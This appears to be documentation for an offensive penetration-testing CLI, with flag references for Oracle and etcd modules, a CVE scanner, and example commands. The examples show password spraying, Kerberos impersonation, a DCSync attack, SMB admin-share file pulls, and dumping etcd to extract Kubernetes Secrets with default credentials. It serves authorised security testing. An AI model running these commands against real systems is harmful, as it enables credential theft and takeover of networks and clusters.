| Action | Auth Required | Description |
|---|---|---|
| LISTENER | No | Enumerate TNS listener metadata, SIDs, and services |
| PROBE | No | Gather server version and edition without credentials |
| AUTH | No (tests creds) | Test credential pairs against the target SID/service |
| QUERY | Yes | Run discovery queries after successful authentication |
Key Flags#
| Flag | Description |
|---|---|
| --targets | Target hosts (IP:port or IP, default port 1521) |
| --actions | Actions: LISTENER, PROBE, AUTH, QUERY (default: PROBE) |
| --sid | Oracle SID to connect to |
| --service-name | Oracle service name to connect to |
| --usernames / -u | Usernames for authentication |
| --passwords / -p | Passwords for authentication |
| --username-file | File containing usernames (one per line) |
| --password-file | File containing passwords (one per line) |
| --timeout | Connection timeout in milliseconds (default 10000) |
| --query-types | Query types for QUERY: SESSION_PRIVS, DBA_USERS, ROLE_PRIVS, VERSION, CUSTOM |
| --custom-query | Custom SQL query for QUERY; adds CUSTOM to query types automatically |
| --allow-mutations | Allow DML/DDL custom SQL queries (off by default, so a custom query cannot change data unless you opt in) |
Help Text#
networkscan pentest service oracle -h
Perform pentest operations against Oracle Database (TNS) services.

LISTENER enumerates listener metadata, SIDs, and services without authentication.
PROBE gathers server version and edition info without authentication.
AUTH attempts credential authentication against the target.
QUERY runs discovery queries (session privileges, users, roles, version) after successful auth.

Usage:
  networkscan pentest service oracle [flags]

Flags:
      --actions strings        Actions: LISTENER, PROBE, AUTH, QUERY (default: PROBE)
      --allow-mutations        Allow DML/DDL custom SQL queries
      --custom-query string    Custom SQL query for QUERY action
  -h, --help                   help for oracle
  -p, --passwords strings      Passwords for authentication
      --password-file string   File containing passwords (one per line)
      --query-types strings    Oracle query types: SESSION_PRIVS, DBA_USERS, ROLE_PRIVS, VERSION, CUSTOM
      --service-name string    Oracle service name to connect to
      --sid string             Oracle SID to connect to
      --targets strings        Target hosts (IP:port or IP, default port 1521)
      --timeout int            Connection timeout in milliseconds (default 10000)
  -u, --usernames strings      Usernames for authentication
      --username-file string   File containing usernames (one per line)

etcd#

Perform pentest operations against etcd services. Supports unauthenticated probing, keyspace reads, credential authentication, full key dumps, and Kubernetes Secret decoding.

etcd is the backing store for Kubernetes clusters. Unauthenticated or default-credential access to it yields the entire cluster's Secrets (cloud IAM tokens, registry credentials, TLS keys), ConfigMaps, and ServiceAccount bearer tokens, bypassing Kubernetes RBAC entirely. Kubernetes does not encrypt Secrets at rest by default; that requires an explicit EncryptionConfiguration on the API server.

Usage#
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions PROBE
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions PROBE,READ_UNAUTH
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions AUTH --usernames root --passwords root,etcd
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions PROBE,READ_UNAUTH,DUMP,K8S_DECODE
Available Actions#
  • PROBE — GET /version, /health, /metrics, /v3/cluster/member/list. Returns server version, cluster version, member list, leader identity, and Kubernetes inference flag.
  • READ_UNAUTH — POST /v3/kv/range with full-keyspace range. Confirms unauthenticated read access (the canonical etcd compromise).
  • AUTH — POST /v3/auth/authenticate with operator-supplied or embedded default credentials (root:root, root:etcd, etc.). Captures JWT bearer token on success.
  • DUMP — Paginated full keyspace dump. Tags entries by prefix (/registry/secrets/, /registry/configmaps/, etc.).
  • K8S_DECODE — Decodes k8s\x00 magic-prefixed entries from the dump into structured Secret, ConfigMap, and ServiceAccount objects. Local-only; no network calls.
Key Flags#
  • --targets - Target hosts (host:port, default port 2379) (required)
  • --actions - Actions to perform: PROBE, READ_UNAUTH, AUTH, DUMP, K8S_DECODE (default: PROBE)
  • --usernames - Usernames for AUTH action (default: root)
  • --passwords - Passwords to try for AUTH action
  • --cluster-endpoints - Override cluster endpoints discovered during PROBE
  • --max-keys - Maximum keys to dump (DUMP action, default: 1000)
  • --key-prefix-filter - Filter dump to keys matching this prefix (e.g. /registry/secrets/)
  • --decode-kubernetes-secrets - Enable K8s Secret decoding in K8S_DECODE action (default: true)
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop AUTH after first successful credential
  • --successful-only - Output only successful AUTH results
Safety Posture#

Read-only by default. PUT, DELETE, COMPACT, DEFRAGMENT, and all auth-mutation endpoints are not implemented. K8S_DECODE is fully local — no additional network calls. DUMP is capped at --max-keys (default 1000) with a truncated flag when the limit is hit.
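As an added example (not networkscan's own code), the tagging that DUMP and K8S_DECODE describe, run offline over a constructed /v3/kv/range response: entries are tagged by registry prefix, capped like --max-keys with a truncated flag, and each value is checked for the plaintext k8s\x00 envelope versus the k8s:enc: prefix the API server writes when encryption at rest is configured, which is how an operator verifies the "not encrypted by default" point above. The protobuf bodies are fabricated stand-ins and are not decoded here.

```python
import base64
import json

# Constructed sample: the JSON shape an etcd v3 gRPC gateway returns for
# POST /v3/kv/range (keys and values base64-encoded); values are fabricated.
def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()

SAMPLE_RANGE_RESPONSE = json.dumps({
    "header": {"revision": "42"},
    "kvs": [
        {"key": _b64(b"/registry/secrets/default/db-creds"),
         "value": _b64(b"k8s\x00\x0a\x0c\x0a\x02v1\x12\x06Secret")},
        {"key": _b64(b"/registry/secrets/kube-system/token"),
         "value": _b64(b"k8s:enc:aescbc:v1:key1:\x9f\x88\x10\x02")},
        {"key": _b64(b"/registry/configmaps/default/app"),
         "value": _b64(b"k8s\x00\x0a\x0f\x0a\x02v1\x12\x09ConfigMap")},
        {"key": _b64(b"/registry/serviceaccounts/default/default"),
         "value": _b64(b"k8s\x00\x0a\x14\x0a\x02v1\x12\x0eServiceAccount")},
        {"key": _b64(b"/registry/pods/default/web"),
         "value": _b64(b"k8s\x00\x0a\x09\x0a\x02v1\x12\x03Pod")},
    ],
    "more": False,
    "count": "5",
})

K8S_MAGIC = b"k8s\x00"   # plaintext Kubernetes protobuf envelope
ENC_MAGIC = b"k8s:enc:"  # prefix written by API-server encryption at rest
PREFIXES = {"/registry/secrets/": "secret",
            "/registry/configmaps/": "configmap",
            "/registry/serviceaccounts/": "serviceaccount"}

def classify_dump(raw_json: str, max_keys: int = 1000) -> dict:
    resp = json.loads(raw_json)
    kvs = resp.get("kvs", [])
    # Mirror DUMP's cap: flag truncation when rows are dropped or etcd has more.
    truncated = len(kvs) > max_keys or bool(resp.get("more"))
    entries = []
    for kv in kvs[:max_keys]:
        key = base64.b64decode(kv["key"]).decode("utf-8", "replace")
        value = base64.b64decode(kv.get("value", ""))
        kind = next((k for p, k in PREFIXES.items() if key.startswith(p)), "other")
        encoding = ("encrypted-at-rest" if value.startswith(ENC_MAGIC)
                    else "plaintext-protobuf" if value.startswith(K8S_MAGIC) else "unknown")
        entries.append({"key": key, "kind": kind, "encoding": encoding})
    secrets = [e for e in entries if e["kind"] == "secret"]
    return {"entries": entries, "truncated": truncated,
            "plaintext_secrets": sum(e["encoding"] == "plaintext-protobuf" for e in secrets),
            "encrypted_secrets": sum(e["encoding"] == "encrypted-at-rest" for e in secrets)}
```

A non-zero plaintext_secrets count on a real dump means Secrets are stored unencrypted in etcd; any encrypted-at-rest tag under /registry/secrets/ shows an EncryptionConfiguration is in effect.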

Help Text#
networkscan pentest service etcd -h
Perform pentest operations against etcd services.

Supports connection probing (PROBE), unauthenticated key reads (READ_UNAUTH),
credential authentication testing (AUTH), full key dump (DUMP), and
Kubernetes secret decoding (K8S_DECODE).

Usage:
  networkscan pentest service etcd [flags]

Flags:
  -h, --help                          help for etcd
      --targets strings               Target hosts (host:port)
      --actions strings               Actions: PROBE,READ_UNAUTH,AUTH,DUMP,K8S_DECODE (default [PROBE])
      --usernames strings             Usernames for AUTH
      --passwords strings             Passwords for AUTH
      --cluster-endpoints strings     Override cluster endpoints
      --max-keys int                  Maximum keys to dump (default 1000)
      --key-prefix-filter string      Filter dump by key prefix
      --decode-kubernetes-secrets     Enable Kubernetes Secret decoding (default true)
      --timeout int                   Connection timeout in milliseconds (default 10000)
      --stop-first-success            Stop after first successful credential
      --successful-only               Output only successful auth results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Scan Commands#

The scan commands perform vulnerability scanning operations against network targets.

CVE Scan#

Perform CVE scanning against network targets using nuclei templates. Scans network services for known CVE vulnerabilities, with templates filtered by application protocol and optionally by year.

Usage#
networkscan pentest scan cve --targets 192.168.1.100:22 --protocol SSH
networkscan pentest scan cve --targets 192.168.1.100:21 --protocol FTP --years 2023,2024,2025
Key Flags#
  • --targets - Target hosts (IP:port or hostname:port) (required)
  • --protocol - Application protocol to filter templates (e.g., FTP, SSH, HTTP, SMB, RPC, TELNET, REDIS, SLP) (required)
  • --years - Filter CVE templates by year (e.g., 2023,2024,2025) (default: all years 2000-2025)
  • --timeout - Timeout in seconds for each scan (default: 30)
  • --threads - Number of concurrent threads (default: 25)
  • --verbose-logs - Enable verbose logging
  • --global-rate-limit - Global rate limit in requests per second (default: no limit)
Help Text#
networkscan pentest scan cve -h
Perform CVE scanning against network targets using nuclei templates.

Usage:
  networkscan pentest scan cve [flags]

Flags:
  -h, --help                         help for cve
      --targets strings              Target hosts (IP:port or hostname:port)
      --protocol string              Application protocol to filter templates (e.g., FTP, SSH, HTTP, SMB, RPC, TELNET, REDIS, SLP)
      --years strings                Filter CVE templates by year (e.g., 2023,2024,2025) (default [2000,2001,...,2025])
      --timeout int                  Timeout in seconds for each scan (default 30)
      --threads int                  Number of concurrent threads (default 25)
      --verbose-logs                 Enable verbose logging
      --global-rate-limit int        Global rate limit (requests per second, default is no limit) (default 0)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Examples#

Basic Authentication Testing#

# Test SMB authentication with domain
networkscan pentest service smb --targets server.domain.com:445 --usernames admin --passwords Password123 --domain CORP --actions AUTH

# Test SSH with key-based auth
networkscan pentest service ssh --targets 192.168.1.10:22 --usernames root --key-file ~/.ssh/id_rsa --actions AUTH,EXEC --execute "whoami"

# Test Telnet with wordlists
networkscan pentest service telnet --targets 192.168.1.20:23 --username-file users.txt --password-file passwords.txt --actions AUTH

Password Spraying#

# SMB password spray
networkscan pentest spray password --targets 192.168.1.0/24 --service SMB --usernames admin,guest --passwords Password123,123456 --domain CORP

# Kerberos username enumeration
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --username-lists DOMAIN_USERNAMES

# LDAP password spray with stealth
networkscan pentest spray password --targets ldap.example.com:389 --service LDAP --usernames user1,user2 --passwords pass1,pass2 --domain EXAMPLE --sleep 2 --jitter 10

Advanced Usage#

# SMB with file download
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin --passwords password --remote-file-path "C$\\Windows\\System32\\drivers\\etc\\hosts"

# LDAP domain dump with stealth
networkscan pentest service ldap --targets dc.example.com:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions AUTH,DOMAINDUMP --sleep 1 --minimal-queries

# Kerberos service ticket with impersonation
networkscan pentest service kerberos --targets dc.example.com:88 --usernames service_account --passwords ServicePass123 --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/webapp.example.com --impersonate administrator

# DCSync attack
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC